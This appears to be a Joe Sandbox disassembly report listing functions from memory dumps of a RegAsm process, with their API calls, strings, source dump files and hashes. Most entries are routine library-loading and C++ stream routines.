Instruction ID: 5d8a75b17f29d6a44946c9f0be64730383fdf9f4fff6335e57f9d0d26268abd3
Opcode Fuzzy Hash: 4685d3a67d85b506202250cad04bf50c600124b7a1d59d623e05e043eb120fb2
Instruction Fuzzy Hash: A821B074A0011D9FDF00AF64D858AEEB7B9AF89209F944419ED0ABB740DB35E909C7E1

Function 6C3074A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C307526
__Init_thread_footer.LIBCMT ref: 6C307566
__Init_thread_footer.LIBCMT ref: 6C307597

Strings

UnmapViewOfFile2, xrefs: 6C307552
kernel32.dll, xrefs: 6C307557

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 02b31d06146345830977afa37813bba0cee0390ace3517916557cf493506d607
Instruction ID: 692d26dab4ce73a4b6e6b01e1509157978ea2d2e71372069baeaee83125b19eb
Opcode Fuzzy Hash: 02b31d06146345830977afa37813bba0cee0390ace3517916557cf493506d607
Instruction Fuzzy Hash: 5A210732701511A7CF148FACC914F993779EB4B7A9F01052CD94547B40C73DE8028EA6

Function 6C307930 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C2BBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C307A3F), ref: 6C2BBF11
Part of subcall function 6C2BBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C307A3F), ref: 6C2BBF5D
Part of subcall function 6C2BBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C307A3F), ref: 6C2BBF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C307968
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C30A264,6C30A264), ref: 6C30799A

Part of subcall function 6C2B9830: free.MOZGLUE(?,?,?,6C307ABE), ref: 6C2B985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C3079E0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C3079E8

Strings

1l, xrefs: 6C3079D0

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID: 1l
API String ID: 3421697164-371518933
Opcode ID: ddb05722e5092a78120546eb01566b33f84f522c19187463c93c73850817d292
Instruction ID: be526c7b42bb2c39eebf4d3a0c31c9ac329636defa7f9fed3cccee079372ee88
Opcode Fuzzy Hash: ddb05722e5092a78120546eb01566b33f84f522c19187463c93c73850817d292
Instruction Fuzzy Hash: B8215C357043049FCB14DF18D889A9EBBB9EF89314F44882DE94A9B751CB34A909CB92

Function 6C307A10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C2BBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C307A3F), ref: 6C2BBF11
Part of subcall function 6C2BBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C307A3F), ref: 6C2BBF5D
Part of subcall function 6C2BBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C307A3F), ref: 6C2BBF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6C307A48
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6C307A7A

Part of subcall function 6C2B9830: free.MOZGLUE(?,?,?,6C307ABE), ref: 6C2B985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C307AC0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C307AC8

Strings

1l, xrefs: 6C307AB0

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID: 1l
API String ID: 3421697164-371518933
Opcode ID: 54ea47938d55ed700daeb20e5dcc9a0b487fa278dc759be2feed8403249e4fbc
Instruction ID: 6a7754135d635ec8b66f44dd7ce1d16497953e42e6b9fab7e9d858da9c83ec3c
Opcode Fuzzy Hash: 54ea47938d55ed700daeb20e5dcc9a0b487fa278dc759be2feed8403249e4fbc
Instruction Fuzzy Hash: 31215C357043049FCB14DF18D899A9EBBB9FF89314F40882CE94A9B751CB34A909CB92

Function 6C30A7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C32F770,-00000001,?,6C31E330,?,6C2CBDF7), ref: 6C30A7AF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C2CBDF7), ref: 6C30A7C2
moz_xmalloc.MOZGLUE(00000018,?,6C2CBDF7), ref: 6C30A7E4
LeaveCriticalSection.KERNEL32(6C32F770), ref: 6C30A80A

Strings

accelerator.dll, xrefs: 6C30A7BF

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
String ID: accelerator.dll
API String ID: 2442272132-2426294810
Opcode ID: ee40c7fdef41c9fa841aaa355def9ff7efc73f1a5e47d5cef857bfdfe9558f19
Instruction ID: 452f1f29809f8927417bf990826c80218e429090e0560b73cd2892458ac1057d
Opcode Fuzzy Hash: ee40c7fdef41c9fa841aaa355def9ff7efc73f1a5e47d5cef857bfdfe9558f19
Instruction Fuzzy Hash: 9C018F717103149F9F04CF99E884D5177B8FB8A795704806AE8498B701DB759800CFA1

Function 004192E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
CloseHandle.KERNEL32(000000FF), ref: 00419327

Strings

:A, xrefs: 004192F8, 004192FB
:A, xrefs: 00419311, 0041933D, 00419314

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleSize
String ID: :A$:A
API String ID: 3849164406-1974578005
Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45

Function 6C2AF0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ole32,?,6C2AEE51,?), ref: 6C2AF0B2
GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C2AF0C2

Strings

Could not find CoTaskMemFree, xrefs: 6C2AF0E3
ole32, xrefs: 6C2AF0AD
Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C2AF0DC

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
API String ID: 2574300362-1578401391
Opcode ID: c926fd394a5d384b14c033d78e92f5db51417f8c1224a110673937ce91255561
Instruction ID: 484bc4873337478ed5677268fb8bc545f8c21f98673aabd28f77a2a63b81602f
Opcode Fuzzy Hash: c926fd394a5d384b14c033d78e92f5db51417f8c1224a110673937ce91255561
Instruction Fuzzy Hash: E4E048717453069B9F145AA79908A2737BDAB1630A714442DF902D1E04EF2ED4058F51

Function 6C2E0080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C2B7204), ref: 6C2E0088
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C2E00A7
FreeLibrary.KERNEL32(?,6C2B7204), ref: 6C2E00BE

Strings

wintrust.dll, xrefs: 6C2E0083
CryptCATAdminAcquireContext2, xrefs: 6C2E00A1

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext2$wintrust.dll
API String ID: 145871493-3385133079
Opcode ID: adcf24aa0fb2ad4c205d5a47ff6ae9e2b7e9260ef3c3f3503b2de0812b6a4818
Instruction ID: 4c60f2843b8f4e02b03497d3587d0a1dfc15b74bcda2a3a9066926ff59a2c71e
Opcode Fuzzy Hash: adcf24aa0fb2ad4c205d5a47ff6ae9e2b7e9260ef3c3f3503b2de0812b6a4818
Instruction Fuzzy Hash: 6FE0EE7820032A9AEF00AB26E808701BAFCEB0F349F40401EEE11D6600EBBCC001AF11

Function 6C2E00D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C2B7235), ref: 6C2E00D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C2E00F7
FreeLibrary.KERNEL32(?,6C2B7235), ref: 6C2E010E

Strings

CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C2E00F1
wintrust.dll, xrefs: 6C2E00D3

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: f28e65fb477092180aa2cce85ca4988dcea8b2adca3b7c9e73680cf9ca53b87a
Instruction ID: b42dbbc821daed67b77b72ebf44166662d3dd0f8ae1d571f53aa81e0256cdccf
Opcode Fuzzy Hash: f28e65fb477092180aa2cce85ca4988dcea8b2adca3b7c9e73680cf9ca53b87a
Instruction Fuzzy Hash: F9E0127020131A9BEF009F299A09B21BAFCE70A349F90401DA90AA9B00DBBC8040AA10

Function 6C2E0120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C2B7297), ref: 6C2E0128
GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C2E0147
FreeLibrary.KERNEL32(?,6C2B7297), ref: 6C2E015E

Strings

CryptCATAdminEnumCatalogFromHash, xrefs: 6C2E0141
wintrust.dll, xrefs: 6C2E0123

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
API String ID: 145871493-1536241729
Opcode ID: 2fac0c8c13dbcfe083de09a0c01d762589b6448a7e8cc8db119463971c6e0cf9
Instruction ID: 7cbf55f54af43dbc9d6af4ba99daaa3db0c825fdb574f962a9fbd7d53a864a2d
Opcode Fuzzy Hash: 2fac0c8c13dbcfe083de09a0c01d762589b6448a7e8cc8db119463971c6e0cf9
Instruction Fuzzy Hash: 46E0927464529A9BEF006F6AE80871ABAFCF70B349F50411DEA16DE740DBBCC0019F50

Function 6C2E0170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C2B7308), ref: 6C2E0178
GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C2E0197
FreeLibrary.KERNEL32(?,6C2B7308), ref: 6C2E01AE

Strings

CryptCATCatalogInfoFromContext, xrefs: 6C2E0191
wintrust.dll, xrefs: 6C2E0173

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATCatalogInfoFromContext$wintrust.dll
API String ID: 145871493-3354427110
Opcode ID: 7b389aab7f72541e75d227343dd4f4fd24b22a8ea7790719c9f7eafbf860cacc
Instruction ID: f484cc56957714c329dd64b1796bcacff0f28955700838cb23b44cf2eeccee60
Opcode Fuzzy Hash: 7b389aab7f72541e75d227343dd4f4fd24b22a8ea7790719c9f7eafbf860cacc
Instruction Fuzzy Hash: 83E09A746852169BEF445F6ADA08B11BBFCF70E349F54405EE98699650DB7C80819A20

Function 6C2E01C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C2B7266), ref: 6C2E01C8
GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6C2E01E7
FreeLibrary.KERNEL32(?,6C2B7266), ref: 6C2E01FE

Strings

wintrust.dll, xrefs: 6C2E01C3
CryptCATAdminReleaseContext, xrefs: 6C2E01E1

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminReleaseContext$wintrust.dll
API String ID: 145871493-1489773717
Opcode ID: 16524563b6433c6cc3268f3c0cd9426f3004b0dc8631d77f39d148a7736443cd
Instruction ID: 278fc6b34c21a5a050a91513e18311e52a6bf6131c533cdada64768e99163330
Opcode Fuzzy Hash: 16524563b6433c6cc3268f3c0cd9426f3004b0dc8631d77f39d148a7736443cd
Instruction Fuzzy Hash: 28E075756853969AEF009B6A9808712BAFCEF0B389F50441DEE06D9640DB7C80019F51

Function 6C30C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C30C0E9), ref: 6C30C418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C30C437
FreeLibrary.KERNEL32(?,6C30C0E9), ref: 6C30C44C

Strings

ntdll.dll, xrefs: 6C30C413
NtQueryVirtualMemory, xrefs: 6C30C431

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: 651f3d8b753967c395a88ecdb266a43b4df379f8002cb8c0b528d2d33ac90cea
Instruction ID: 92ebc00b9efbe949b7d749aee6d28bfd18bac261ead7fb1c07deaedd7552c9a4
Opcode Fuzzy Hash: 651f3d8b753967c395a88ecdb266a43b4df379f8002cb8c0b528d2d33ac90cea
Instruction Fuzzy Hash: B7E092786053219BEF017B71AA18711BAFCF70A608F04411EEA0595602EBBDC0018E61

Function 6C3075B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C30748B,?), ref: 6C3075B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C3075D7
FreeLibrary.KERNEL32(?,6C30748B,?), ref: 6C3075EC

Strings

ntdll.dll, xrefs: 6C3075B3
RtlNtStatusToDosError, xrefs: 6C3075D1

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: a8ca10024278c3d54161fde34c0f08976d691c03bb44ee22ea9f5288bc2d32d5
Instruction ID: a16dfd797a194b81617d2ae7dc58fbba91bb11d22086302d02b25466aee20063
Opcode Fuzzy Hash: a8ca10024278c3d54161fde34c0f08976d691c03bb44ee22ea9f5288bc2d32d5
Instruction Fuzzy Hash: 99E0EC75700315ABEF006FAAD848B017EFCEB0B398F10502DE946D5600EBBD9082CF20

Function 6C307600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C307592), ref: 6C307608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C307627
FreeLibrary.KERNEL32(?,6C307592), ref: 6C30763C

Strings

NtUnmapViewOfSection, xrefs: 6C307621
ntdll.dll, xrefs: 6C307603

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: f719eda95e8b3cbfa1652c13a104cbb210e4f71eaf84f8402388c31b13071b3d
Instruction ID: 282ec96ba39189c0771a8943dde1cb2d17cefa4701c3ceb9bd92364cab637c0d
Opcode Fuzzy Hash: f719eda95e8b3cbfa1652c13a104cbb210e4f71eaf84f8402388c31b13071b3d
Instruction Fuzzy Hash: 05E092B1601315ABEF006BAA9C087017ABCE71B299F00411DEA46D5A00E7BDC0048F24

Function 6C30C1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C30C1DE,?,00000000,?,00000000,?,6C2B779F), ref: 6C30C1F8
GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6C30C217
FreeLibrary.KERNEL32(?,6C30C1DE,?,00000000,?,00000000,?,6C2B779F), ref: 6C30C22C

Strings

wintrust.dll, xrefs: 6C30C1F3
WinVerifyTrust, xrefs: 6C30C211

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: WinVerifyTrust$wintrust.dll
API String ID: 145871493-2991032369
Opcode ID: 5332777318833b012d4fece180eacaaa25d1d4b0a1c0197dbf14b9aaa158f619
Instruction ID: 8b79f958a1860dd9e8c5689d5b171a15d8ef8602f969d39cfc910f5f5e28bfba
Opcode Fuzzy Hash: 5332777318833b012d4fece180eacaaa25d1d4b0a1c0197dbf14b9aaa158f619
Instruction Fuzzy Hash: D1E092763053519BDF007B71A908702BEFCEF0A608F04051DE90595A06E7BD80008B65

Function 6C30C240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C2B77F6), ref: 6C30C248
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6C30C267
FreeLibrary.KERNEL32(?,6C2B77F6), ref: 6C30C27C

Strings

wintrust.dll, xrefs: 6C30C243
CryptCATAdminAcquireContext, xrefs: 6C30C261

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
